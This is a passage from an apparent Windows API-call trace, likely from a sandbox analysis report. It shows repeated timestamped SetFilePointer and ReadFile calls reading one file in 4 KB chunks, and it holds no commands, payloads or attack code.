lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4b000 [0088.435] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4c000 [0088.435] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4d000 [0088.436] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4e000 [0088.436] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4f000 [0088.437] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.437] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x50000 [0088.437] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.438] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x51000 [0088.438] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.438] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x52000 [0088.438] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.439] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x53000 [0088.439] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.439] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x54000 [0088.439] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.439] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x55000 [0088.440] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.440] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x56000 [0088.440] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.440] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x57000 [0088.440] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.441] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x58000 [0088.441] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.442] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x59000 [0088.442] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.442] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5a000 [0088.442] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.442] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5b000 [0088.442] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.443] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5c000 [0088.443] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.443] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5d000 [0088.443] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.444] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5e000 [0088.444] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.444] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5f000 [0088.444] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.444] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x60000 [0088.445] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.445] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x61000 [0088.445] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.446] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x62000 [0088.446] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.446] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x63000 [0088.446] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.447] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x64000 [0088.447] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.447] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x65000 [0088.447] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.448] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x66000 [0088.448] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.448] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x67000 [0088.448] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.448] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x68000 [0088.450] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.450] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x69000 [0088.450] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.451] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6a000 [0088.451] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.451] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6b000 [0088.451] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.452] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6c000 [0088.452] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.452] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6d000 [0088.452] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.453] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6e000 [0088.453] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.453] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6f000 [0088.453] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.453] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x70000 [0088.453] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.454] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x71000 [0088.454] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.455] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x72000 [0088.455] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.455] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x73000 [0088.455] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.456] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x74000 [0088.456] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.456] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x75000 [0088.456] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.457] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x76000 [0088.457] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.457] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x77000 [0088.457] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.458] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x78000 [0088.458] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.458] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x79000 [0088.458] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.459] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7a000 [0088.459] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.459] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7b000 [0088.460] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.460] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7c000 [0088.460] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.460] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7d000 [0088.460] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.461] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7e000 [0088.461] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.462] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7f000 [0088.462] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.462] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x80000 [0088.462] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.464] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x81000 [0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.465] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x82000 [0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.465] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x83000 [0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, 